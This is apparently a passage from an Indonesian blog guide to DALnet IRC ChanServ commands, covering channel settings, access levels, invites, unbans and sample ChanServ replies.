Penggunaan : /chanserv SET #channel UNSECURE on|off
Keterangan : Perintah ini apabila di-set pada posisi ON maka siapapun yang berada dalam access list nickname Founder tidak perlu identify terlebih dahulu untuk melakukan perubahan pada setting channel. Disarankan untuk membiarkan setting UNSECURE pada keadaan keadaan default (OFF).

SET - PRIVATE
Penggunaan : /chanserv SET #channel PRIVATE on|off
Keterangan : Perintah ini apabila di-set pada posisi ON maka akan membuat perintah /chanserv INVITE tidak dapat digunakan. Dan hanya user yang mengetahui nama channel saja yang bisa masuk, nama channel juga tidak muncul di daftar channel (mirip dengan MLOCK +p).

SET - MEMO
Penggunaan : /chanserv SET #channel MEMO none|aop|sop|founder
Keterangan : Melalui perintah ini seorang Founder dapat menentukan siapa saja yang berhak mengirimkan memo channel.
none - tidak seorangpun dapat mengirimkan memo
aop - semua operator (AOP, SOP, Founder) berhak mengirimkan memo
sop - hanya operator dengan akses SOP dan Founder yang berhak mengirimkan memo
founder - hanya founder yang berhak mengirimkan memo

SET - SUCCESSOR
Penggunaan : /chanserv SET #channel SUCCESSOR nickname|-
Keterangan : Dengan perintah ini seorang Founder dapat menentukan nickname pengganti/cadangan apabila nickname founder expired. Pada saat nickname founder expired maka hak akses founder akan dialihkan kepada nickname cadangan tersebut. Apabila kamu ingin menghapus setting nickname Successor gunakan perintah “/chanserv SET #channel SUCCESSOR -”.
Contoh : /chanserv SET #Sejati SUCCESSOR Peace04
Men-set SUCCESSOR channel #Sejati pada nickname Peace04

SET - WEBPASSWD
Penggunaan : /chanserv SET #channel WEBPASSWD password
Keterangan : Perintah ini gunanya untuk menentukan password bagi web site channel. DALnet memberikan fasilitas Webhosting bagi channel yang teregistrasi di databasenya. Keterangan lebih lanjut silahkan kunjungi DALnet Documentation Project Site bagian Webhosting Service.
Catatan : Password website harus berbeda dengan password channel supaya dapat dengan aman diserahkan kepada orang lain untuk dikelola.
Contoh : /chanserv SET #Sejati WEBPASSWD vrwebsite888
Men-set password website channel #Sejati dengan “vrwebsite888?.

SET - MAILBLOCK
Penggunaan : /chanserv SET #channel MAILBLOCK on|off
Keterangan : Perintah ini mengizinkan seorang Founder untuk menghidupkan/mematikan fasilitas MAILBLOCK. Apabila di-set pada posisi ON maka perintah “/chanserv SENDPASS” tidak dapat lagi digunakan.
Catatan : Fasilitas MAILBLOCK ini tidak boleh dihidupkan (ON) sampai seorang Founder yakin sekali dirinya tidak menderita penyakit “lupa ingatan”.

INVITE
Penggunaan : /chanserv INVITE #channel
Keterangan : Perintah ini akan meng-Invite diri kamu sendiri ke dalam channel yang di-set mode +R/+O/+i/+l/+k/+b.
Catatan : Untuk menggunakan perintah ini minimal kamu harus memiliki akses AOP di channel tersebut.

ACC / ACCESS
Penggunaan : /chanserv ACC|ACCESS #channel nickname
Keterangan : Perintah ini digunakan oleh seseorang yang memiliki akses AOP atau lebih tinggi untuk melihat hak akses dirinya sendiri atau orang lain di channel. Berikut di bawah ini adalah definisi dari level hak akses (dalam angka) :
-2 = Channel is frozen or closed (channel dibekukan atau ditutup)
-1 = AutoKICKed from the channel (nickname bersangkutan masuk dalam daftar AKICK channel)
0 = basic (nickname bersangkutan tidak punya akses di channel atau sedang tidak On-Line)
1 = AutoOp (akses AOP - Auto Operator)
2 = SuperOp (akses SOP - Super Operator)
3 = Has founder access via a NickServ access list mask (akses Founder via daftar akses pada database NickServ)
4 = Has founder access via identification to NickServ (akses Founder via Identify password nick pada NickServ)
5 = Has founder access via identification to ChanServ (akses Founder via Identify password channel pada ChanServ)
Catatan : Untuk menggunakan perintah ini minimal kamu harus memiliki akses AOP di channel tersebut.
Contoh : /chanserv ACC #Virtual XowoX
Melihat level hak akses nick XowoX di channel #Virtual dan notify dari ChanServ lebih kurang seperti di bawah ini :
-ChanServ- XowoX ACC #Virtual 2 (SOP)

WHY
Penggunaan : /chanserv WHY #channel nickname
Keterangan : Perintah ini mirip dengan perintah ACC/Access, hasilnya berupa status user di channel (AOP/SOP/Founder). Gunanya untuk melihat hak akses yang digunakan user untuk naik menjadi operator channel.
Catatan : Untuk menggunakan perintah ini minimal kamu harus memiliki akses AOP di channel tersebut.
Contoh : /chanserv WHY #Sejati Peace03
Melihat status/hak akses nick `L1QuId di channel #Sejati dan notify dari ChanServ lebih kurang seperti di bawah ini :
-ChanServ- `Peace03 has FOUNDER access to #Sejati. Reason: Identification to services with the channel password.

UNBAN
Penggunaan : /chanserv UNBAN #channel nickname|*|nick!user@host.domain
Keterangan : Perintah ini gunanya untuk meminta ChanServ meng-Unbanned diri kamu, nickname lain, host/domain tertentu, dan seluruh daftar banned. Untuk meng-Unbanned diri kamu cukup ketik “/chanserv UNBAN #channel”.
Catatan : AOP hanya dapat meng-Unbanned diri sendiri, nickname lain dan host/domain tertentu, SOP dan Founder dapat meng-Unbanned seluruh daftar banned dengan menggunakan tanda *.

COUNT
Penggunaan : /chanserv COUNT #channel
Keterangan : Perintah ini untuk meminta ChanServ menghitung jumlah AOP, SOP dan AKICK suatu channel.
Catatan : Untuk menggunakan perintah ini minimal kamu harus memiliki akses AOP di channel tersebut.
Contoh : /chanserv COUNT #Sejati
Menghitung jumlah AOP, SOP dan AKICK channel #Virtual dan notify dari ChanServ lebih kurang seperti di bawah ini :
-ChanServ- Channel: #Sejati - AOP: 20 SOP: 11 AKICK: 5

INFO
Penggunaan : /chanserv INFO #channel
Keterangan : Untuk menampilkan informasi tentang channel (setting, topik, tanggal register, tanggal terakhir penambahan AOP/SOP, dll).
Contoh : /chanserv INFO #Sejati
Menampilkan informasi tentang channel #Virtual, hasilnya lebih kurang seperti di bawah ini :
-ChanServ- Info for #sejati:
-ChanServ- Founder : peace03 (~peace@vt-auto.com)
-ChanServ- Successor :
-ChanServ- Mode Lock : +nt-k
-ChanServ- Last Topic : ¨¨°º©o¿,,¿o©º°¨¨°º© /!WelCoMe BaCk To #SeJati~ /!\ www.linuxer-crew.info /!\ ~ http://www.free-shell.net <— shell gratis Ayo MainKan Jari Tangannya Ikutan Main Game !!!! Yg Mengumpulkan Point Terbanyak Bakalan DI Kasih Gratis PSYbnC…!!!! (peace03`)
-ChanServ- Description: welcome
-ChanServ- Options : SecuredOps, Ident, “Sticky” Topics
-ChanServ- Memo Level : AOP
-ChanServ- Registered : Mon 01-Jan-2007 13:37:39 UTC
-ChanServ- Last opping: Sun 24-Jun-2007 06:30:48 UTC
-ChanServ- *** End of Info ***
 

Ranieqyu Copyright © 2010 Designed by Ipietoon Blogger Template Sponsored by Online Shop Vector by Artshare